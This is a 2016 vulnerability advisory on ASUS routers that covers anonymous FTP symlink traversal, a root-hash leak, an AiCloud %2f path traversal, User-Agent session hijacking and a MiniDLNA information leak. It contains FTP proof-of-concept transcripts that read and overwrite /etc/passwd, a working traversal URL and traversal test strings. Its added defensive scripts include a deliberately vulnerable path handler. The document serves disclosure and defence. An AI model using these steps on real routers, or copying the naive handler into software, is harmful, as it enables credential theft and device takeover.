Wednesday 20 April 2016

Multiple vulnerabilities affecting several ASUS Routers

Written by Eldar Marcussen

Affected Vendor: ASUS http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router 

Summary

ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18U

1. Insecure default configuration for the Anonymous FTP user account

Description

The affected ASUS routers suffer from an insecure default configuration for Anonymous users once anonymous access is enabled. Write access is enabled by default for all directories on the attached storage. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.

Impact

The anonymous FTP user can write arbitrary files to the attached storage device.

2. FTP users can access certain system files when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.

Impact

The attacker can read certain system files via FTP.

3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user


User                 Condition A    Condition B    Condition C
Anonymous            x              x              x
FTP User Accounts    x              x              x

Impact

The attacker gains access to all system files, including /etc/passwd. This exposes the unsalted MD5 lighttpd password hash, which is automatically created by copying the root user’s credentials for SSH / Administrative Interface access.

Proof of concept

A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password: 
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0              39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x    2 0        0             860 Jan 06 12:58 bin
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx    1 0        0              34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx    1 0        0              31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x    2 0        0            2860 Jan 06 12:58 lib
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx    1 0        0              31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx    1 0        0              32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx    1 0        0           11269 Jul 22  2013 asus_lighttpd.conf
-rwxrwxrwx    1 0        0              39 Feb 18  2014 asus_lighttpdpassword
-rwxrwxrwx    1 0        0            3264 Oct 25  2012 asus_modules.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_script
drwxrwxrwx    1 0        0            4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx    1 0        0              40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx    1 0        0           36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx    1 0        0              97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx    1 0        0             156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx    1 0        0               0 Jan 05 12:15 hello.html
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 init.d
-rwxrwxrwx    1 0        0             263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx    1 0        0             214 Jan 06 14:09 passwd
-rwxrwxrwx    1 0        0              23 Jan 05 12:20 test.sh
226 Directory send OK.

4. FTP users can overwrite arbitrary system files

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user

User                 Condition A    Condition B    Condition C
Anonymous            x              x              x
FTP User Accounts    x              x              x

Impact

The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.

Proof of concept

ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx    1 0        0           11269 Jul 22  2013 asus_lighttpd.conf
-rwxrwxrwx    1 0        0              39 Feb 18  2014 asus_lighttpdpassword
-rwxrwxrwx    1 0        0            3264 Oct 25  2012 asus_modules.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_script
drwxrwxrwx    1 0        0            4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx    1 0        0              40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx    1 0        0           36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx    1 0        0              97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx    1 0        0             156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx    1 0        0               0 Jan 05 12:15 hello.html
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 init.d
-rwxrwxrwx    1 0        0             263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx    1 0        0             214 Jan 06 14:09 passwd
-rwxrwxrwx    1 0        0              23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************|   214      283.94 KiB/s    00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)
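The FTP transcripts above show three things a defender can check for from a plain directory listing: the user is outside the USB share (`cd /../opt` succeeds, so there is no confinement), system configuration is aliased into the share through symlinks, and the files under asusware.arm/etc are mode 0777. The script below is an added example, not part of this advisory or of ASUS firmware. It parses `ls -l` style listings in the form vsftpd-type servers print (FTP status lines are ignored) and reports those three signs. The share root /tmp/mnt/sda1 is an assumption inferred from the symlink targets, and the README line in the second sample is constructed; the other sample lines are copied from the listings above.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import List, Optional

# One "ls -l" line as the FTP server prints it; status lines such as
# "150 Here comes the directory listing." do not match and are skipped.
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)\s+"
    r"\w{3}\s+\d{1,2}\s+[\d:]+\s+(?P<rest>.+)$"
)

@dataclass
class Entry:
    mode: str
    size: int
    name: str
    target: Optional[str] = None   # symlink target when mode starts with "l"

    @property
    def is_symlink(self) -> bool:
        return self.mode[0] == "l"

    @property
    def world_writable(self) -> bool:
        return self.mode[8] == "w"    # the "other" write bit

def parse_listing(text: str) -> List[Entry]:
    entries: List[Entry] = []
    for line in text.splitlines():
        m = LS_LINE.match(line.rstrip())
        if not m:
            continue
        rest, target = m.group("rest"), None
        if m.group("mode").startswith("l") and " -> " in rest:
            rest, target = rest.split(" -> ", 1)
        entries.append(Entry(m.group("mode"), int(m.group("size")), rest, target))
    return entries

def is_within(path: str, root: str) -> bool:
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root + "/")

def audit(cwd: str, listing: str, share_root: str) -> List[str]:
    """Findings for one listing taken in directory `cwd`; `share_root` is the
    directory FTP users are supposed to be confined to."""
    findings: List[str] = []
    if not is_within(cwd, share_root):
        findings.append(f"NO-CONFINEMENT: listing of {cwd} is outside {share_root}")
    for e in parse_listing(listing):
        if e.is_symlink and e.target:
            resolved = posixpath.normpath(posixpath.join(cwd, e.target))
            side = "inside" if is_within(resolved, share_root) else "outside"
            findings.append(f"SYMLINK: {e.name} -> {resolved} ({side} share root)")
        elif e.world_writable:
            kind = "directory" if e.mode[0] == "d" else "file"
            findings.append(f"WORLD-WRITABLE {kind}: {e.name} ({e.mode})")
    return findings

# Constructed sample input: a subset of the PoC listings above, plus one
# benign README line that is not from the advisory.
SHARE_ROOT = "/tmp/mnt/sda1"        # assumed USB mount FTP users should be confined to

OPT_LISTING = """\
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0              39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x    2 0        0             860 Jan 06 12:58 bin
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
226 Directory send OK.
"""

ETC_LISTING = """\
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx    1 0        0              39 Feb 18  2014 asus_lighttpdpassword
-rwxrwxrwx    1 0        0             214 Jan 06 14:09 passwd
-rw-r--r--    1 0        0             120 Jan 06 14:09 README
"""

if __name__ == "__main__":
    for cwd, listing in (("/opt", OPT_LISTING),
                         ("/tmp/mnt/sda1/asusware.arm/etc", ETC_LISTING)):
        print(f"== {cwd}")
        for finding in audit(cwd, listing, SHARE_ROOT):
            print("  " + finding)
```

Run against a real device, the `cwd` value comes from the server's reply to `pwd` and the listing from `ls` in the same session; a NO-CONFINEMENT finding for any directory, or a WORLD-WRITABLE finding for anything under asusware.arm/etc, is the condition the advisory describes.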

5. Sensitive file disclosure in AiCloud’s AiDisk server

Description

AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server. This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue while impersonating an administrative user via the session management flaw (TJA-ASUS-06).

Impact

Attackers can access sensitive files.

Proof of concept

https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword
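The PoC URL reaches the Download Master configuration directory through percent-encoded slashes (%2f). The following is an added example, not AiDisk's code, contrasting a hypothetical handler that checks the raw URL segments against a deny-list and decodes afterwards (the classic cause of this bug class, shown only as an illustration) with a handler that decodes, normalises and only then validates the path against the share root and a protected subtree. The /tmp/mnt mount point and the PROTECTED list are assumptions drawn from the FTP listings earlier in this advisory.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout, taken from the FTP listings in this advisory: USB media is
# mounted under /tmp/mnt and Download Master keeps its configuration, including
# asus_lighttpdpassword, in <disk>/asusware.arm. Both values are assumptions.
SHARE_ROOT = "/tmp/mnt"
PROTECTED = ("asusware.arm",)    # subtrees never served to share users

class PathRejected(ValueError):
    """Raised when a request path must not be mapped onto the filesystem."""

def resolve_naive(request_path: str) -> str:
    """Hypothetical vulnerable pattern (an illustration, not AiDisk's code):
    the deny-list is checked against the raw URL segments and the path is
    percent-decoded only afterwards, so a %2f inside one segment hides the
    protected directory name from the check."""
    segments = request_path.split("/")
    if ".." in segments or any(seg in PROTECTED for seg in segments):
        raise PathRejected("protected or traversal segment")
    return posixpath.join(SHARE_ROOT, unquote(request_path))

def resolve_hardened(request_path: str) -> str:
    """Decode first, normalise, then validate the path the filesystem will see."""
    decoded = unquote(request_path)
    if "\x00" in decoded or unquote(decoded) != decoded:
        raise PathRejected("NUL byte or double encoding")
    # normpath folds "..", "." and "//" before the containment check
    full = posixpath.normpath(posixpath.join(SHARE_ROOT, decoded.lstrip("/")))
    if full != SHARE_ROOT and not full.startswith(SHARE_ROOT + "/"):
        raise PathRejected("escapes share root")
    rel = full[len(SHARE_ROOT):].lstrip("/")
    if any(seg in PROTECTED for seg in rel.split("/")):
        raise PathRejected("protected subtree")
    return full

def describe(resolver, request_path: str) -> str:
    """'served <path>' or 'rejected (<reason>)' for the given resolver."""
    try:
        return "served " + resolver(request_path)
    except PathRejected as exc:
        return f"rejected ({exc})"

if __name__ == "__main__":
    for path in ("sda1/Music/song.mp3",
                 "sda1%2fasusware.arm/etc%2fasus_lighttpdpassword",   # path from the PoC URL
                 "sda1/..%2f..%2fetc%2fpasswd"):
        print(f"{path}\n  naive:    {describe(resolve_naive, path)}"
              f"\n  hardened: {describe(resolve_hardened, path)}")
```

The order of operations is the whole point: any check performed on the still-encoded string can be bypassed by encoding the character it looks for, so decoding and normalisation must come before the containment and deny-list checks, and the check must run on the final filesystem path rather than on the request string.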

6. Session management flaw in AiCloud

Description

AiCloud suffers from a session management flaw. If the attacker shares the admin’s external network (or is on the same local network), they can set their User-Agent to match the admin’s User-Agent and thereby impersonate the Admin user. This is only possible while the Admin has an active session. Note: this vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per the AiDisk file disclosure (TJA-ASUS-05).

Impact

Attackers can access sensitive files.
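The flaw above is a session bound to attributes the client controls (address and User-Agent) rather than to a secret. The following is an added example, not AiCloud's code: a hypothetical weak scheme that recognises the admin by (address, User-Agent), placed beside a scheme in which the only session credential is a random bearer token with an idle timeout. The admin's User-Agent string, the 203.0.113.10 address and the 900-second timeout are constructed values.

```python
import hashlib
import secrets
import time
from typing import Dict, Optional, Tuple

class UserAgentSessions:
    """Hypothetical weak scheme (an illustration, not AiCloud's code): after
    the admin logs in, later requests are attributed to the admin by matching
    the client address and User-Agent seen at login. Any client behind the
    same NAT, or on the same LAN, that sends the same UA string is
    indistinguishable from the admin for as long as the session is active."""

    def __init__(self) -> None:
        self.active: Dict[Tuple[str, str], str] = {}

    def login(self, ip: str, user_agent: str, username: str) -> None:
        self.active[(ip, user_agent)] = username

    def whoami(self, ip: str, user_agent: str) -> Optional[str]:
        return self.active.get((ip, user_agent))

    def logout(self, ip: str, user_agent: str) -> None:
        self.active.pop((ip, user_agent), None)


class TokenSessions:
    """Hardened scheme: identity comes only from a random bearer token issued
    at login and returned in a cookie; address and UA are never trusted."""

    def __init__(self, ttl_seconds: int = 900) -> None:
        # keyed by a hash of the token so a leaked session table does not
        # hand out live tokens
        self.active: Dict[str, Tuple[str, float]] = {}
        self.ttl = ttl_seconds

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, username: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self.active[self._key(token)] = (username, now + self.ttl)
        return token

    def whoami(self, token: Optional[str], now: Optional[float] = None) -> Optional[str]:
        if not token:
            return None
        now = time.time() if now is None else now
        entry = self.active.get(self._key(token))
        if entry is None:
            return None
        username, expires = entry
        if now >= expires:                          # idle session has expired
            del self.active[self._key(token)]
            return None
        return username

    def logout(self, token: str) -> None:
        self.active.pop(self._key(token), None)


if __name__ == "__main__":
    UA = "Mozilla/5.0 (constructed admin browser string)"
    weak = UserAgentSessions()
    weak.login("203.0.113.10", UA, "admin")
    # a second client behind the same NAT address sending the same UA string
    print("weak scheme, copied UA:", weak.whoami("203.0.113.10", UA))
    strong = TokenSessions()
    tok = strong.login("admin")
    print("token scheme, copied UA but no cookie:", strong.whoami(None))
    print("token scheme, admin's own cookie:", strong.whoami(tok))
```

In a real deployment the token is sent as a cookie with the Secure and HttpOnly flags, and the short idle timeout plus an explicit logout shrink the window in which any session, however it is identified, can be reused.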

7. Sensitive information disclosure in MiniDLNA server

Description

The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.

Impact

Attackers can access sensitive information remotely, without authentication.

Proof of concept

http://[IP/HOST]:8200

MiniDLNA status

Media library

Audio files    347
Video files    0
Image files    6

Connected clients

ID    Type                    IP Address        HW Address            Connections
0    Samsung Series [CDEF]    192.168.1.99    48:5A:3F:6D:02:A4    0
1    Unknown                    192.168.1.55    78:31:C1:CD:11:63    0

0 connections currently open

Solution

Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/

Response timeline

07/01/2016 - Vendor contacted.
22/03/2016 - Patch available.
26/03/2016 - Advisory released.
